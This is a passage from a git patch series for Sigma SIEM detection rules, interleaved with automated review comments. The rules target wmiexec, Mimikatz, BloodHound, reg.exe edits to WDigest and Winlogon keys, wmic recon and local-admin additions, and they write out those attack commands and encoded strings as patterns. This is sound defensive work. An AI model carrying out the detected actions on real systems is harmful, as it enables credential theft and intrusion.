@@ -14,7 +14,7 @@ with open(path.join(here, 'LONG_DESCRIPTION.md'), encoding='utf-8') as f: setup( name='sigmatools', - version='0.21.0', + version='0.22.0', description='Tools for the Generic Signature Format for SIEM Systems', long_description=long_description, long_description_content_type="text/markdown", From dd67c4fd73b3aeab426959dfbe32e291a6925455 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Thu, 8 Sep 2022 22:50:57 +0200 Subject: [PATCH 41/73] Dev --- ...ile_event_win_wmiexec_default_filename.yml | 21 +++++++ ...le_event_win_writing_local_admin_share.yml | 4 +- .../proc_creation_win_apt_cloudhopper.yml | 36 ++++++------ ...reation_win_base64_invoke_susp_cmdlets.yml | 44 +++++++-------- .../proc_creation_win_susp_base64_invoke.yml | 56 +++++++++---------- .../proc_creation_win_susp_reg_add.yml | 15 ++--- ...creation_win_wmic_computersystem_recon.yml | 27 +++++++++ 7 files changed, 127 insertions(+), 76 deletions(-) create mode 100644 rules/windows/file_event/file_event_win_wmiexec_default_filename.yml create mode 100644 rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml diff --git a/rules/windows/file_event/file_event_win_wmiexec_default_filename.yml b/rules/windows/file_event/file_event_win_wmiexec_default_filename.yml new file mode 100644 index 000000000..e65d0b42c --- /dev/null +++ b/rules/windows/file_event/file_event_win_wmiexec_default_filename.yml 
@@ -0,0 +1,21 @@ +title: Wmiexec Default Output File +id: 8d5aca11-22b3-4f22-b7ba-90e60533e1fb +status: experimental +description: Detects the creation of the default output filename used by the wmicexec tool +author: Nasreddine Bencherchali +date: 2022/06/02 +references: + - https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/ +tags: + - attack.lateral_movement + - attack.t1047 +logsource: + category: file_event + product: windows +detection: + selection: + TargetFilename|re: '__\d{10}\.\d{1,7}' + condition: selection +falsepositives: + - Unlikely +level: critical diff --git a/rules/windows/file_event/file_event_win_writing_local_admin_share.yml b/rules/windows/file_event/file_event_win_writing_local_admin_share.yml index 380927c1f..70d5d569f 100644 --- a/rules/windows/file_event/file_event_win_writing_local_admin_share.yml +++ b/rules/windows/file_event/file_event_win_writing_local_admin_share.yml @@ -2,8 +2,8 @@ title: Writing Local Admin Share id: 4aafb0fa-bff5-4b9d-b99e-8093e659c65f status: experimental description: | - Aversaries may use to interact with a remote network share using Server Message Block (SMB). - This technique is used by post-exploitation frameworks. + Aversaries may use to interact with a remote network share using Server Message Block (SMB). + This technique is used by post-exploitation frameworks. author: frack113 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share diff --git a/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml b/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml index 3cf033ac6..f59435e26 100755 --- a/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml 
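Review bot: `TargetFilename|re: '__\d{10}\.\d{1,7}'` is unanchored and has no path constraint, so any file whose name contains two underscores, ten digits, a dot and more digits — the shape of an epoch-timestamp temp name — fires at `level: critical` with `falsepositives: Unlikely`. If the referenced CrowdStrike write-up confirms the output file is created under the Windows directory via the admin share, anchoring to that location, e.g. `TargetFilename|re: '\\Windows\\__\d{10}\.\d{1,7}$'`, keeps the rule specific; the `re` modifier is also not available in every sigmac backend, which is worth a comment on the line. The description's `wmicexec` should read `wmiexec`.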
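Review bot: The re-indented description still reads `Aversaries may use to interact with a remote network share`, which is misspelled and missing its object; since the lines are rewritten anyway, `Adversaries may use this technique to interact with a remote network share using Server Message Block (SMB).` fixes both at no cost. The hunk touches only the description block.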
@@ -1,29 +1,31 @@ title: WMIExec VBS Script id: 966e4016-627f-44f7-8341-f394905c361f status: test -description: Detects suspicious file execution by wscript and cscript +description: Detects wmiexec vbs version execution by wscript or cscript author: Florian Roth references: - - https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf + - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf date: 2017/04/07 -modified: 2021/11/27 +modified: 2022/09/08 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - Image|endswith: '\cscript.exe' - CommandLine|contains|all: - - '.vbs' - - '/shell' - condition: selection + selection: + Image|endswith: + - '\cscript.exe' + - '\wscript.exe' + CommandLine|contains|all: + - '.vbs' + - '/shell' + condition: selection fields: - - CommandLine - - ParentCommandLine + - CommandLine + - ParentCommandLine falsepositives: - - Unlikely + - Unlikely level: high tags: - - attack.execution - - attack.g0045 - - attack.t1059.005 + - attack.execution + - attack.g0045 + - attack.t1059.005 diff --git a/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml b/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml index 7aa6fba00..a23d17ab2 100644 --- a/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml +++ b/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml @@ -4,8 +4,8 @@ status: test description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets author: pH-T related: - - id: 6385697e-9f1b-40bd-8817-f4a91f40508e - type: similar + - id: 6385697e-9f1b-40bd-8817-f4a91f40508e + type: similar date: 2022/05/31 tags: - attack.execution 
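Review bot: The description is generalised to `Detects wmiexec vbs version execution by wscript or cscript`, yet the rule keeps the group attribution tag `attack.g0045` and lives in `proc_creation_win_apt_cloudhopper.yml`, so a generic tool detection now carries a threat-group label that the rewritten description no longer supports. Either drop `- attack.g0045` or annotate it, e.g. `- attack.g0045 # attribution from the original Cloud Hopper report; selection is generic`, so consumers of the tag know it is historical rather than a per-match claim.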
@@ -15,26 +15,26 @@ tags: references: - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - CommandLine|contains: - # Invoke-BloodHound - - 'SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA' - - 'kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA' - - 'JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA' - # Invoke-Mimikatz - - 'SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA' - - 'kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A' - - 'JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg' - # Invoke-WMIExec - - 'SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA' - - 'kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw' - - 'JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA' - condition: selection + selection: + CommandLine|contains: + # Invoke-BloodHound + - 'SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA' + - 'kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA' + - 'JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA' + # Invoke-Mimikatz + - 'SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA' + - 'kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A' + - 'JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg' + # Invoke-WMIExec + - 'SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA' + - 'kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw' + - 'JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA' + condition: selection fields: - - CommandLine + - CommandLine falsepositives: - - Unlikely -level: high \ No newline at end of file + - Unlikely +level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml b/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml index 4a1fc1312..e5b7452db 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml 
@@ -4,8 +4,8 @@ status: test description: Detects base64 encoded powershell 'Invoke-' call author: pH-T related: - - id: fd6e2919-3936-40c9-99db-0aa922c356f7 - type: similar + - id: fd6e2919-3936-40c9-99db-0aa922c356f7 + type: similar date: 2022/05/20 tags: - attack.execution 
@@ -15,32 +15,32 @@ tags: references: - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - CommandLine|contains: - # Invoke- - - 'SQBuAHYAbwBrAGUALQ' - - 'kAbgB2AG8AawBlAC0A' - - 'JAG4AdgBvAGsAZQAtA' - filter_other_rule: # already covered in fd6e2919-3936-40c9-99db-0aa922c356f7 - CommandLine|contains: - # Invoke-BloodHound - - 'SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA' - - 'kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA' - - 'JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA' - # Invoke-Mimikatz - - 'SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA' - - 'kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A' - - 'JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg' - # Invoke-WMIExec - - 'SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA' - - 'kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw' - - 'JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA' - condition: selection and not 1 of filter* + selection: + CommandLine|contains: + # Invoke- + - 'SQBuAHYAbwBrAGUALQ' + - 'kAbgB2AG8AawBlAC0A' + - 'JAG4AdgBvAGsAZQAtA' + filter_other_rule: # already covered in fd6e2919-3936-40c9-99db-0aa922c356f7 + CommandLine|contains: + # Invoke-BloodHound + - 'SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA' + - 'kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA' + - 'JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA' + # Invoke-Mimikatz + - 'SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA' + - 'kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A' + - 'JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg' + # Invoke-WMIExec + - 'SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA' + - 'kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw' + - 'JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA' + condition: selection and not 1 of filter* fields: - - CommandLine + - CommandLine falsepositives: - - Unlikely -level: high \ No newline at end of file + - Unlikely +level: high 
diff --git a/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml b/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml index e0764e923..483e68900 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml @@ -1,13 +1,13 @@ -title: Reg Add Suspicious Path To AppDataLow +title: Reg Add Suspicious Paths id: b7e2a8d4-74bb-4b78-adc9-3f92af2d4829 status: experimental -description: Detects when an adversary uses the 'AppDataLow' subkeys as a place to store data as seen in the URSNIF phishing campaign +description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md -author: frack113 +author: frack113, Nasreddine Bencherchali date: 2022/08/19 -modified: 2022/08/20 +modified: 2022/09/08 logsource: category: process_creation product: windows @@ -17,9 +17,10 @@ detection: - OriginalFileName: 'reg.exe' selection_path: CommandLine|contains: - - '\Software\AppDataLow\Software\Microsoft\' - - '\Software\Policies\Microsoft\Windows\OOBE' - - '\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon' + - '\AppDataLow\Software\Microsoft\' + - '\Policies\Microsoft\Windows\OOBE' + - '\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon' + - '\CurrentControlSet\Control\SecurityProviders\WDigest' condition: all of selection_* falsepositives: - Legitimate use diff --git a/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml b/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml new file mode 100644 index 000000000..a78ba6588 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml 
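Review bot: The broadened `selection_path` strings drop the `\Software` prefix and add `\CurrentControlSet\Control\SecurityProviders\WDigest`, but nothing visible in this hunk or in `condition: all of selection_*` requires the `add` verb the title promises; if the `selection_img` block above the hunk does not constrain the command line, `reg query` or `reg export` of the same keys — routine in audit and hardening scripts — also match. A third selection, `selection_verb: CommandLine|contains: ' add '`, would make the rule match its title. The WDigest entry also deserves a one-line reason, e.g. `# UseLogonCredential under WDigest controls cleartext credential caching`, which the `# Add more suspicious registry locations below` comment added in PATCH 42 does not supply.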
@@ -0,0 +1,27 @@ +title: Suspicious Get Local Groups Information with WMIC +id: 164eda96-11b2-430b-85ff-6a265c15bf32 +status: experimental +description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model...etc. +references: + - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ +author: Nasreddine Bencherchali +date: 2022/09/08 +logsource: + product: windows + category: process_creation +detection: + selection_img: + - Image|endswith: '\wmic.exe' + - OriginalFileName: 'wmic.exe' + selection_cli: + CommandLine|contains|all: + - ' computersystem ' + - ' get ' + condition: all of selection* +falsepositives: + - Unknown +level: medium +tags: + - attack.discovery + - attack.execution + - attack.t1047 From fbc773307838da523f0458c1f97a38188d0e18f6 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Thu, 8 Sep 2022 22:52:24 +0200 Subject: [PATCH 42/73] Update proc_creation_win_susp_reg_add.yml --- .../process_creation/proc_creation_win_susp_reg_add.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml b/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml index 483e68900..c034f4a89 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml 
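Review bot: The title "Suspicious Get Local Groups Information with WMIC" does not describe this rule: the description and `selection_cli` are about `wmic computersystem get`, which returns machine facts such as domain, user name and model, not group membership, so the title looks copied from another rule. Something like `title: Computer System Discovery Via Wmic.EXE` would match the detection. The tags only carry `attack.t1047`; since the point of the command is host information gathering, `attack.t1082` (System Information Discovery) is likely the more accurate technique to add, to be confirmed against how the repository tags similar recon rules.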
@@ -17,14 +17,15 @@ detection: - OriginalFileName: 'reg.exe' selection_path: CommandLine|contains: + # Add more suspicious registry locations below - '\AppDataLow\Software\Microsoft\' - '\Policies\Microsoft\Windows\OOBE' - '\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon' - '\CurrentControlSet\Control\SecurityProviders\WDigest' condition: all of selection_* falsepositives: - - Legitimate use -level: medium + - Rare legitimate add to registry via cli (to these locations) +level: high tags: - attack.defense_evasion - attack.t1112 From 9711afd0d627a76da7f8a23efa55029d013e4900 Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Fri, 9 Sep 2022 09:08:50 +0200 Subject: [PATCH 43/73] Added deprecating warning in sigmac with color --- Pipfile | 1 + tools/sigma/sigmac.py | 6 +++++- 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/Pipfile b/Pipfile index 718c305f6..51a9e476b 100644 --- a/Pipfile +++ b/Pipfile @@ -21,6 +21,7 @@ progressbar2 = "~=3.47" pymisp = "~=2.4.123" PyYAML = "~=5.1" "ruamel.yaml" = "*" +termcolor = "*" [requires] python_version = "3.8" diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index e762a34d1..257ab07c0 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -1,7 +1,7 @@ #!/usr/bin/env python3 # A Sigma to SIEM converter # Copyright 2016-2017 Thomas Patzke, Florian Roth - +import os # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation, either version 3 of the License, or @@ -37,6 +37,7 @@ import codecs import copy import time import datetime +from termcolor import colored sys.stdout = codecs.getwriter('utf-8')(sys.stdout.detach()) 
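Review bot: `termcolor = "*"` in the Pipfile hunk is the only entry in the `[packages]` block that is left unpinned; the neighbouring lines (`progressbar2 = "~=3.47"`, `pymisp = "~=2.4.123"`, `PyYAML = "~=5.1"`) all use compatible-release ranges. An unbounded spec lets a future major release (or a compromised upload) be pulled in on the next `pipenv install` without review, for a package that only colours a warning string. Pin it the same way as its siblings, e.g. `termcolor = "~=1.1"`, to whichever release was actually tested.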
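Review bot: `from termcolor import colored` is added as an unconditional top-level import in sigmac.py, so any installation without the new package (an existing virtualenv, or an install path that does not read the Pipfile, which I cannot see updated in this series) now fails with ImportError before argument parsing, for a purely cosmetic feature. The import should fall back to an identity function so sigmac keeps converting rules when termcolor is absent. Note also that the first sigmac hunk drops `import os` into the middle of the license header; that line is unused, and the later patch in this series removes it again.

```python
# … unchanged: import datetime …
try:
    from termcolor import colored
except ImportError:  # colour is cosmetic; never fail conversion over it
    def colored(text, *args, **kwargs):
        return text
```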
@@ -182,6 +183,9 @@ def main(): cmdargs = argparser.parse_args() scm = SigmaConfigurationManager() + print(colored("!!! WARNING", "red"), "sigmac is deprecated in favor of", colored("sigma-cli", "green"), "using", colored("pySigma", "green"), ". Please stop contributing backends to this tool, it will be removed in 2023.") + print() + logger = logging.getLogger(__name__) if cmdargs.debug: # pragma: no cover logging.basicConfig(filename='sigmac.log', filemode='w', level=logging.DEBUG) From 38a2e76af83c048b95e9203a9cc2664ba877a3fb Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Fri, 9 Sep 2022 10:03:33 +0200 Subject: [PATCH 44/73] fix: general filter should filter on both selections --- .../windows/file_change/file_change_win_2022_timestomping.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/file_change/file_change_win_2022_timestomping.yml b/rules/windows/file_change/file_change_win_2022_timestomping.yml index cfdf05658..0a2643eaf 100644 --- a/rules/windows/file_change/file_change_win_2022_timestomping.yml +++ b/rules/windows/file_change/file_change_win_2022_timestomping.yml @@ -8,7 +8,7 @@ references: - https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html author: frack113, Florian Roth date: 2022/08/12 -modified: 2022/09/05 +modified: 2022/09/09 tags: - attack.t1070.006 - attack.defense_evasion @@ -33,7 +33,7 @@ detection: - TargetFilename|endswith: - '.tmp' - '.temp' - condition: ( selection1 and not filter1 ) or ( selection2 and not filter2 ) and not 1 of gen_filter* + condition: (( selection1 and not filter1 ) or ( selection2 and not filter2 )) and not 1 of gen_filter* falsepositives: - Changes made to or by the local NTP service level: high From 6b9470f8e45ca0ea033a7599bfd7875dc587e671 Mon Sep 17 00:00:00 2001 
From: David ANDRE Date: Fri, 9 Sep 2022 12:24:30 +0200 Subject: [PATCH 45/73] New message as requested.\n Only displayed on full help and when no arguments is passed --- tools/sigma/sigmac.py | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 257ab07c0..8c5f2e62f 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -1,7 +1,6 @@ #!/usr/bin/env python3 # A Sigma to SIEM converter # Copyright 2016-2017 Thomas Patzke, Florian Roth -import os # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation, either version 3 of the License, or @@ -65,6 +64,12 @@ ERR_FULL_FIELD_MATCH = 90 # Allowed fields in output allowed_fields = ["title", "id", "status", "description", "author", "references", "fields", "falsepositives", "level", "tags", "filename"] +deprecation_warning_message = colored("Sigmac will be deprecated by the end of 2022", + "red") + " in favour of sigma-cli and pySigma. Please " + colored("stop contributing backends", "red") + \ + " to this tool. Limited support is offered until the end of 2023, " \ + "especially for backends that haven't been migrated yet.\n " + + def alliter(path): for sub in path.iterdir(): if sub.name.startswith("."): 
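Review bot: `deprecation_warning_message` is built with `colored(...)` at module import time, so the ANSI escape sequences are baked into the string regardless of where it is later written; once it is embedded in the argparse description (next hunk) `sigmac --help > usage.txt` or a CI log will contain raw `\x1b[31m…\x1b[0m` sequences. Gate the colouring on an interactive terminal, e.g. `_color = colored if sys.stdout.isatty() else (lambda text, *a, **k: text)` and use `_color(...)` in the two places, or build the plain message once and colour it only when printing to a TTY. `sys` is already imported in this file, so no new dependency is needed.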
@@ -97,7 +102,7 @@ class ActionBackendHelp(argparse.Action): def set_argparser(): """Sets up and parses the command line arguments for Sigmac. Returns the argparser""" - argparser = argparse.ArgumentParser(description="Convert Sigma rules into SIEM signatures.") + argparser = argparse.ArgumentParser(description="Convert Sigma rules into SIEM signatures.\n" + deprecation_warning_message, formatter_class=argparse.RawTextHelpFormatter) argparser.add_argument("--recurse", "-r", action="store_true", help="Use directory as input (recurse into subdirectories is not implemented yet)") argparser.add_argument("--filter", "-f", help=""" Define comma-separated filters that must match (AND-linked) to rule to be processed. @@ -183,9 +188,6 @@ def main(): cmdargs = argparser.parse_args() scm = SigmaConfigurationManager() - print(colored("!!! WARNING", "red"), "sigmac is deprecated in favor of", colored("sigma-cli", "green"), "using", colored("pySigma", "green"), ". Please stop contributing backends to this tool, it will be removed in 2023.") - print() - logger = logging.getLogger(__name__) if cmdargs.debug: # pragma: no cover logging.basicConfig(filename='sigmac.log', filemode='w', level=logging.DEBUG) @@ -205,6 +207,7 @@ def main(): sys.exit(0) elif len(cmdargs.inputs) == 0: print("Nothing to do!") + print(deprecation_warning_message) argparser.print_usage() sys.exit(0) From 607521f6bd6a25eea3246d27876721164c1f420b Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Fri, 9 Sep 2022 12:33:00 +0200 Subject: [PATCH 46/73] Added depcration notice in README page --- tools/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tools/README.md b/tools/README.md index 5742d6077..946b38aa8 100644 --- a/tools/README.md +++ b/tools/README.md 
@@ -8,6 +8,8 @@ This folder contains libraries and the following command line tools: # Sigmac +Sigmac will be deprecated by the end of 2022 in favour of [sigma-cli](https://github.com/SigmaHQ/sigma-cli) and [pySigma](https://github.com/SigmaHQ/pySigma). Please stop contributing backends to this tool. Limited support is offered until the end of 2023, especially for backends that haven't been migrated yet. + The Sigmac is one of the most important files, as this is what sets the correct fields that your backend/database will use after being translated from the (original) log source's field names. Please read below to understand how a SIGMAC is constructed. Additionally, see [Choosing the Right Sigmac](#choosing-the-right-sigmac) for an idea of which file and command line options (if applicable) that will best suite your environment. From 43e0d4fe6a1c984a4e441f42f5914a5f27b6c720 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Fri, 9 Sep 2022 13:51:20 +0200 Subject: [PATCH 47/73] fix: FP with windows defender --- .../process_access/proc_access_win_hack_sysmonente.yml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_access/proc_access_win_hack_sysmonente.yml b/rules/windows/process_access/proc_access_win_hack_sysmonente.yml index e999257ec..9b3776bcc 100644 --- a/rules/windows/process_access/proc_access_win_hack_sysmonente.yml +++ b/rules/windows/process_access/proc_access_win_hack_sysmonente.yml @@ -8,6 +8,7 @@ references: - https://github.com/codewhitesec/SysmonEnte/ - https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png date: 2022/09/07 +modified: 2022/09/09 tags: - attack.defense_evasion - attack.t1562.002 
@@ -22,9 +23,12 @@ detection: SourceImage|startswith: - 'C:\Program Files' - 'C:\Windows\System32\' + filter_msdefender: + SourceImage|startswith: 'C:\ProgramData\Microsoft\Windows Defender\Platform\' + SourceImage|endswith: '\MsMpEng.exe' selection_calltrace: CallTrace: 'Ente' - condition: ( selection_1 and not filter_1 ) or selection_calltrace + condition: ( selection_1 and not 1 of filter_* ) or selection_calltrace falsepositives: - Unknown level: high From 70f9ff61ca3c1d78f101fa84ee8264d41f57e9b3 Mon Sep 17 00:00:00 2001 
From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 9 Sep 2022 15:02:31 +0200 Subject: [PATCH 48/73] Big Update --- .../posh_ps_root_certificate_installed.yml | 8 +-- .../proc_creation_win_apt_hurricane_panda.yml | 30 +++++------ .../proc_creation_win_apt_wocao.yml | 6 +-- ...reation_win_email_exfil_via_powershell.yml | 30 +++++++++++ ...reation_win_import_cert_susp_locations.yml | 32 ++++++++++++ ...eation_win_mal_hermetic_wiper_activity.yml | 38 +++++++------- ..._creation_win_malware_conti_shadowcopy.yml | 6 +-- .../proc_creation_win_malware_notpetya.yml | 50 +++++++++---------- .../proc_creation_win_net_add_local_user.yml | 26 ++++++++++ ..._win_net_default_accounts_manipulation.yml | 5 ++ .../proc_creation_win_net_recon.yml | 8 +-- ...proc_creation_win_netsh_allow_port_rdp.yml | 16 +++--- .../proc_creation_win_node_abuse.yml | 34 +++++++++++++ ...reation_win_redirect_local_admin_share.yml | 26 ++++++++++ .../proc_creation_win_reg_enable_rdp.yml | 5 +- ...proc_creation_win_susp_add_local_admin.yml | 23 ++++++--- ...ation_win_susp_add_user_remote_desktop.yml | 24 ++++++--- ...creation_win_susp_new_service_creation.yml | 3 +- .../proc_creation_win_susp_reg_add.yml | 3 +- .../proc_creation_win_susp_reg_bitlocker.yml | 13 +++-- ...proc_creation_win_susp_schtasks_delete.yml | 36 +++++++++++++ ..._creation_win_susp_schtasks_delete_all.yml | 25 ++++++++++ ...roc_creation_win_susp_schtasks_disable.yml | 18 +++---- ...eation_win_susp_schtasks_schedule_type.yml | 18 ++++--- ...win_susp_schtasks_schedule_type_system.yml | 37 ++++++++++++++ ...creation_win_user_discovery_get_aduser.yml | 30 +++++++++++ .../proc_creation_win_wevtutil_recon.yml | 28 +++++++++++ .../registry_event_net_ntlm_downgrade.yml | 4 +- .../registry_set_disable_system_restore.yml | 8 +-- .../registry_set_enabling_turnoffcheck.yml | 3 +- .../registry_set_hide_function_user.yml | 2 +- ...stry_set_install_root_or_ca_certificat.yml | 2 +- 
...set_winlogon_allow_multiple_tssessions.yml | 22 ++++++++ 33 files changed, 492 insertions(+), 127 deletions(-) create mode 100644 rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml create mode 100644 rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml create mode 100644 rules/windows/process_creation/proc_creation_win_net_add_local_user.yml create mode 100644 rules/windows/process_creation/proc_creation_win_node_abuse.yml create mode 100644 rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml create mode 100644 rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml create mode 100644 rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml create mode 100644 rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml create mode 100644 rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml create mode 100644 rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml create mode 100644 rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml b/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml index 11e8de26c..7340abc67 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml 
@@ -17,12 +17,12 @@ logsource: detection: selection1: ScriptBlockText|contains|all: - - 'Move-Item' - - 'Cert:\LocalMachine\Root' + - 'Move-Item' + - 'Cert:\LocalMachine\Root' selection2: ScriptBlockText|contains|all: - - 'Import-Certificate' - - 'Cert:\LocalMachine\Root' + - 'Import-Certificate' + - 'Cert:\LocalMachine\Root' condition: 1 of selection* falsepositives: - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP diff --git a/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml b/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml index e8169e203..5859e1083 100755 --- a/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml @@ -4,25 +4,25 @@ status: test description: Detects Hurricane Panda Activity author: Florian Roth references: - - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/ + - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/ date: 2019/03/04 modified: 2021/11/27 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - - CommandLine|contains|all: - - 'localgroup' - - 'admin' - - '/add' - - CommandLine|contains: - - '\Win64.exe' - condition: selection + selection: + - CommandLine|contains|all: + 